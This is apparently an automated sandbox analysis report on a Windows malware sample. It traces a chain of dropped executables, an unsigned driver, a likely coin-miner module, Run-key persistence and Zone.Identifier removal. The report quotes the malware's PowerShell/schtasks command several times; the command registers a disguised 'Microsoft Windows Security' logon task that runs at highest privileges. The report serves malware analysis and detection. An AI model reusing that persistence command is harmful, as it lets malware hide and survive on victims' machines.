Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

Source: C:\Users\user\AppData\Local\Temp\2910625892.exe

Code function: 24_2_009EAAAC LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

24_2_009EAAAC

Source: initial sample

Static PE information: section where entry point is pointing to: .zero

Source: 78476062.exe.5.dr	Static PE information: real checksum: 0x6517 should be: 0x659f
Source: 2779421088.exe.8.dr	Static PE information: real checksum: 0x0 should be: 0x7bbe8
Source: newtpp[1].exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x22cb3
Source: 896429707.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x22cb3
Source: jacrzswcvuml.tmp.29.dr	Static PE information: real checksum: 0x0 should be: 0x554c2a
Source: sysnldcvmr.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x22cb3
Source: f5TWdT5EAc.exe	Static PE information: real checksum: 0x0 should be: 0x7e9fc
Source: rh[1].exe.8.dr	Static PE information: real checksum: 0x0 should be: 0x7bbe8

Source: f5TWdT5EAc.exe	Static PE information: section name: .zero
Source: rh[1].exe.8.dr	Static PE information: section name: .textbss
Source: 2779421088.exe.8.dr	Static PE information: section name: .textbss
Source: nxmr[1].exe.11.dr	Static PE information: section name: .xdata
Source: 2688734187.exe.11.dr	Static PE information: section name: .xdata
Source: winupsecvmgr.exe.18.dr	Static PE information: section name: .xdata
Source: jacrzswcvuml.tmp.29.dr	Static PE information: section name: _RANDOMX
Source: jacrzswcvuml.tmp.29.dr	Static PE information: section name: _TEXT_CN
Source: jacrzswcvuml.tmp.29.dr	Static PE information: section name: _TEXT_CN
Source: jacrzswcvuml.tmp.29.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Code function: 3_2_002519F1 push ecx; ret	3_2_00251A04
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Code function: 8_2_005519C1 push ecx; ret	8_2_005519D4
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7A0F9 push FFFFFF82h; iretd	9_3_00F7A0FB
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7D8A0 push 0000002Eh; iretd	9_3_00F7D8A2
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7EE8C push es; iretd	9_3_00F7EE8D
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7B86D push ebx; ret	9_3_00F7B864
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7A840 push ebp; retf	9_3_00F7A841
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7E83C pushad ; ret	9_3_00F7E841
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7E80E push eax; iretd	9_3_00F7E81D
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7B1DD push eax; ret	9_3_00F7B1DF
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7EF92 push 00000038h; iretd	9_3_00F7EF9D
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7E586 pushad ; retf	9_3_00F7E599
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7EF6E push FFFFFFD2h; retf	9_3_00F7EF91
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F79F6A push eax; ret	9_3_00F79F75
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F7B70B push ebx; ret	9_3_00F7B864
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F7A0F9 push FFFFFF82h; iretd	9_2_00F7A0FB
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F7D8A0 push 0000002Eh; iretd	9_2_00F7D8A2
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F7B86D push ebx; ret	9_2_00F7B864
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F7A840 push ebp; retf	9_2_00F7A841
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F7E83C pushad ; ret	9_2_00F7E841
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F7E80E push eax; iretd	9_2_00F7E81D
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F7B1DD push eax; ret	9_2_00F7B1DF
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F78904 push ecx; ret	9_2_00F78917
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F7E586 pushad ; retf	9_2_00F7E599
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F79F6A push eax; ret	9_2_00F79F75
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F7B70B push ebx; ret	9_2_00F7B864
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_3_0274225D push eax; ret	10_3_0274225F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_3_02746012 push 00000038h; iretd	10_3_0274601D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_3_02745606 pushad ; retf	10_3_02745619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_3_027428ED push ebx; ret	10_3_027428E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_3_027418C0 push ebp; retf	10_3_027418C1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\AppData\Local\Temp\896429707.exe

Executable created and started: C:\Windows\sysnldcvmr.exe

Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Source: C:\Windows\sysnldcvmr.exe	File created: C:\Users\user\AppData\Local\Temp\78476062.exe	Jump to dropped file
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exe	Jump to dropped file
Source: C:\Windows\sysnldcvmr.exe	File created: C:\Users\user\AppData\Local\Temp\1171111125.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	File created: C:\Windows\sysnldcvmr.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	File created: C:\Users\user\AppData\Local\Temp\896429707.exe	Jump to dropped file
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys	Jump to dropped file
Source: C:\Windows\sysnldcvmr.exe	File created: C:\Users\user\AppData\Local\Temp\1657630034.exe	Jump to dropped file
Source: C:\Windows\sysnldcvmr.exe	File created: C:\Users\user\AppData\Local\Temp\640832494.exe	Jump to dropped file
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	File created: C:\Users\user\AppData\Local\Temp\34D7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exe	Jump to dropped file
Source: C:\Windows\sysnldcvmr.exe	File created: C:\Users\user\AppData\Local\Temp\2910625892.exe	Jump to dropped file
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	File created: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	File created: C:\Users\user\AppData\Local\Temp\2779421088.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2688734187.exe	File created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	File created: C:\Users\user\AppData\Local\Temp\2688734187.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\896429707.exe

File created: C:\Windows\sysnldcvmr.exe

Jump to dropped file

Boot Survival

Uses Register-ScheduledTask to add task schedules

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	File opened: C:\Users\user\AppData\Local\Temp\34D7.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	File opened: C:\Users\user\AppData\Local\Temp\896429707.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	File opened: C:\Users\user\AppData\Local\Temp\896429707.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	File opened: C:\Windows\sysnldcvmr.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	File opened: C:\Users\user\AppData\Local\Temp\1171111125.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	File opened: C:\Users\user\AppData\Local\Temp\78476062.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	File opened: C:\Users\user\AppData\Local\Temp\640832494.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	File opened: C:\Users\user\AppData\Local\Temp\1657630034.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	File opened: C:\Users\user\AppData\Local\Temp\2910625892.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	File opened: C:\Users\user\AppData\Local\Temp\2779421088.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	File opened: C:\Users\user\AppData\Local\Temp\2688734187.exe:Zone.Identifier read attributes \| delete	Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\640832494.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Process information set: NOOPENFILEERRORBOX
